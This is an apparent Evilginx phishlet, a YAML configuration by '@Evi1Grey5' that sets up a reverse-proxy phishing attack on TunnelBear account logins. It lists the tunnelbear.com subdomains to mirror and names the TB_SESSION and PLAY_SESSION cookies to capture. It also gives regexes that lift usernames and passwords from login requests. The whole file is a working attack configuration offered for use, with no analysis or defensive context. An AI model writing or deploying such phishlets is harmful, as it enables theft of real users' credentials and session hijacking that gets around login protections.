
author: '@Evi1Grey5'
min_ver: '3.0.0'

proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'tunnelbear.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'prod-api-dashboard', orig_sub: 'prod-api-dashboard', domain: 'tunnelbear.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'tunnelbear.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'prod-api-core', orig_sub: 'prod-api-core', domain: 'tunnelbear.com', session: true, is_landing: false, auto_filter: true}
auth_tokens:
  - domain: '.tunnelbear.com'
    keys: ['TB_SESSION','PLAY_SESSION']
    type: 'cookie'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)'
    type: 'json'
login:
  domain: 'tunnelbear.com'
  path: '/account/login'